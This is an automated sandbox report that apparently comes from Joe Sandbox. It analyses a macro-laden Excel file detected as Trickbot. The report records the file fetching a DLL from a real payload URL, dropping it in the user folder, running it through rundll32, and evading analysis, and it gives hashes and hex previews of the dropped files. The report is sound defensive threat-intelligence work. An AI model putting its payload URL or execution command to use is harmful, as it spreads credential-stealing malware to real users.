                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: hsdksksk.iem.0.drBinary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
                Source: hsdksksk.iem.0.drBinary or memory string: INTERNALNAMESNIFFER.EXE
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001C095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001C0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00221030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1c052e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.1c052e.0.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1c052e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.1c052e.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                c527325d_by_Libranalysis.xls4%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.2.rundll32.exe.290000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                koneckotechnology.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://koneckotechnology.com/netmons.dll0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                koneckotechnology.com
                198.54.114.131
                truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://koneckotechnology.com/netmons.dllfalse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpfalse
                  high
                  http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpfalse
                    high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpfalse
                      high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpfalse
                        high
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpfalse
                            high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            198.54.114.131
                            koneckotechnology.comUnited States
                            22612NAMECHEAP-NETUSfalse

                            General Information

                            Joe Sandbox Version:32.0.0 Black Diamond
                            Analysis ID:412517
                            Start date:12.05.2021
                            Start time:18:42:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 15m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:c527325d_by_Libranalysis (renamed file extension from none to xls)
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@7/7@1/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 3.8% (good quality ratio 3.8%)
                            • Quality average: 100%
                            • Quality standard deviation: 0%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            Show All
                            • Max analysis timeout: 720s exceeded, the analysis took too long
                            • TCP Packets have been reduced to 100
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            18:42:44API Interceptor1x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            198.54.114.131Dridex.xlsGet hashmaliciousBrowse
                            • kmschoolsystems.net/lzpd0w.zip

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            NAMECHEAP-NETUSCRPR7mRha6.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            W9YDH79i8G.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            Ko4zQgTBHv.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            Purchase Order.exeGet hashmaliciousBrowse
                            • 198.54.126.165
                            wed.docGet hashmaliciousBrowse
                            • 198.54.122.60
                            ORDER CONFIRMATION.docGet hashmaliciousBrowse
                            • 198.54.122.60
                            SecuriteInfo.com.Trojan.Packed2.43091.10004.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            6e5c05e1_by_Libranalysis.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                            • 198.54.122.60
                            Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                            • 198.54.117.216
                            main_setup_x86x64.exeGet hashmaliciousBrowse
                            • 162.255.119.164
                            00098765123POIIU.exeGet hashmaliciousBrowse
                            • 199.192.23.253
                            e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                            • 185.61.154.27
                            2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                            • 198.54.115.133
                            337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                            • 198.54.122.60
                            Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                            • 198.54.117.212
                            Updated Order list -804333.exeGet hashmaliciousBrowse
                            • 198.54.115.56
                            NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                            • 198.54.117.212
                            BELLOW FABRICATION Dwg.exeGet hashmaliciousBrowse
                            • 199.188.200.15
                            file.exeGet hashmaliciousBrowse
                            • 198.54.115.133

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):643072
                            Entropy (8bit):6.894237499747235
                            Encrypted:false
                            SSDEEP:12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
                            MD5:3BB9FE6B7E6B4D9C3A3C83DE6AACD952
                            SHA1:57C343AE5E95FE702B759737522E85FE9E97FE5E
                            SHA-256:697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                            SHA-512:1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
                            Malicious:true
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\0ADE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):82102
                            Entropy (8bit):7.890626096401754
                            Encrypted:false
                            SSDEEP:1536:9KWFA4s1rWGH3W4nAeWRlMVGoIahaDHTU6hryF70KiE:9KWFA4s1rW23W4ng2sTU2yF70KiE
                            MD5:E82FF35FBBA49380E42ADE23F37906D7
                            SHA1:C28717159DD42598A4E7501BB7630D0A32EB2D43
                            SHA-256:B6E45C9566AACDB98B66EAD78EF489D9855FFD38A6637C547917A9BCE7D487D9
                            SHA-512:0F9F100EA6A326F6A273BFD05251480BAF288B8767DB237AA14C0F63D8EDCC921A62FE0F6454475ACA01A3EFFA842067A00255018FE8AD398B27F57CED7A9497
                            Malicious:false
                            Reputation:low
                            Preview: .U.N.0....;D....&M....]2...0.Ic...1......A...H.$.......5..D...Y....J.u..^......pJ..e[@v.:.........[...s...+.....t>Z..3.y.r#......\z...:e..Z..N.T]..s..U?v.T.....'.`.I.P.iL... ...R$Z.~..A.z......^..La.Q.#Os<..q.i..VP]......|0.......8Ivi..A.i..H..2..'n.........D^^./.|...:-Ayykik....*d.49Ii..(.G#.%.b3.....eFnok.}.A..}|. .../..|..Phf6.....s...r/".?)R.{w...g|.(..>6..#.1]:.W...B.....P.3..D.1i.W....W...z......P.&.y..V........PK..........!..uq.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 00:42:41 2021, atime=Thu May 13 00:42:41 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.479919638534255
                            Encrypted:false
                            SSDEEP:12:85QmuLgXg/XAlCPCHaXtB8XzB/XKX+WnicvbrubDtZ3YilMMEpxRljKnXcTdJP9O:85zQ/XTd6jEYeviDv3qVrNru/
                            MD5:CE58868C681A133B5618CD5A11E59B32
                            SHA1:CDA344214073322A2281F6A7E75472B916A085F7
                            SHA-256:2A4853E8E4D33E583147762DC659C7CFB989934470057CB9A16388E976FF9979
                            SHA-512:EFA723EAE3BCCB4480697868B5F7DFDA84DCCCE3AF8192118FF181E71329014A1B68549FF3A0DC3E7C2315893CAB6BF8F63F1307BFE6E03B9BA3A833D825170A
                            Malicious:false
                            Reputation:low
                            Preview: L..................F...........7G...,+C.G...,+C.G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RU...Desktop.d......QK.X.RU.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\c527325d_by_Libranalysis.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 00:42:27 2021, mtime=Thu May 13 00:42:41 2021, atime=Thu May 13 00:42:41 2021, length=107520, window=hide
                            Category:dropped
                            Size (bytes):2168
                            Entropy (8bit):4.557606654529506
                            Encrypted:false
                            SSDEEP:48:8uB/XT0jdOE+MJNbOE6VQh2uB/XT0jdOE+MJNbOE6VQ/:8m/XojdFtJNbF6VQh2m/XojdFtJNbF6K
                            MD5:5DD899C8911F8629C1994B65031DE5F0
                            SHA1:BF27500481C85281F59A1F12462C9BEBAF7E1EEB
                            SHA-256:53281AB5EB97BF792FE85FFD5E674A083AFCEB24D8F74425786ACEF051B31006
                            SHA-512:3F6D19EC89A50F64CB479E8F6191140AA9E153D6D299CCCBDE88E51EED0A0F2FC47305145CB227462D337249C8617CD6613E813653C20D37E98496A216D662DC
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... .....);.G...,+C.G....7C.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RN...Desktop.d......QK.X.RN.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..T...RQ. .C52732~1.XLS..f......RN..RN.*...V.....................c.5.2.7.3.2.5.d._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\c527325d_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.5.2.7.3.2.5.d._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):125
                            Entropy (8bit):4.774522284712134
                            Encrypted:false
                            SSDEEP:3:oyBVomMvZc6pMHUwSLMp6leQXS4c6pMHUwSLMp6lmMvZc6pMHUwSLMp6lv:dj6hcCM0N/S4cCM0NbhcCM0Nf
                            MD5:356E64908463A408181B3E82536C2014
                            SHA1:05226031E825F789B29C6D92B36A35C658A1B7CE
                            SHA-256:536B17F7E0945BA45960E38619F68081CB0493F0BE9475A9B4BA381D26DBFC13
                            SHA-512:EB86FFBC504744D139215354F8EAC9DF2A51FC2B406537238922DA95F6DA00FA59BF5E85671231BEB09E85D0D9E9C652F84DB089AEC8F8560669BC727A6A6EFE
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..c527325d_by_Libranalysis.LNK=0..c527325d_by_Libranalysis.LNK=0..[xls]..c527325d_by_Libranalysis.LNK=0..
                            C:\Users\user\Desktop\DADE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16
                            Category:dropped
                            Size (bytes):140623
                            Entropy (8bit):6.795332205043937
                            Encrypted:false
                            SSDEEP:3072:hm8rmjAItyzElBIL6lECbgBGGP5xLmuCSSN2rTUKyF70aieW2vHWdhdvHWg7hm8b:E8rmjAItyzElBIL6lECbgBvP5NmuCSSw
                            MD5:960C9C8ECB04B532BD365699A5BB9086
                            SHA1:A264CE9566E1022E2D60B307EC18B4F2C42691B2
                            SHA-256:40CCC51ECF8F45715966469B32FF9CFB0AA33B0023A83CC21C4AC2EE1B7E8BC8
                            SHA-512:86A65096F56B69CEE72D9BAC829CB62F5C4D261CD69CE4F42E2E2B5FB3428FD2CE6829B587F8E64A0DA46C9491C7F064234D7ABA125E283F45388BEA6261870E
                            Malicious:false
                            Reputation:low
                            Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...........
                            C:\Users\user\hsdksksk.iem
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):643072
                            Entropy (8bit):6.894237499747235
                            Encrypted:false
                            SSDEEP:12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
                            MD5:3BB9FE6B7E6B4D9C3A3C83DE6AACD952
                            SHA1:57C343AE5E95FE702B759737522E85FE9E97FE5E
                            SHA-256:697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                            SHA-512:1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
                            Malicious:true
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5465, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 13:44:28 2021, Security: 0
                            Entropy (8bit):3.2168699589694834
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:c527325d_by_Libranalysis.xls
                            File size:283648
                            MD5:c527325d4d0b51734637b5344a3df760
                            SHA1:f71b0baa85537ec1709701f39e8e9fd95f9b3d62
                            SHA256:468cd4b5d89425cd29bb028696804ed339eb2c0c37b010b62442fbb5a8f778ba
                            SHA512:074cfe3ecc88e982a704e979a3d63a7c286a30c8656dc71cf528336c7862090cdd134ebf641d336b0b7b6092838b007649bead23fe4cc1039a0a5611dc61f18c
                            SSDEEP:6144:ncPiTQAVW/89BQnmlcGvgZ7rDjo88B3cvJK+6mF+:tk+
                            File Content Preview:........................>.......................(...........................#...$...%...&...'..................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "c527325d_by_Libranalysis.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5465
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-05-12 12:44:28
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
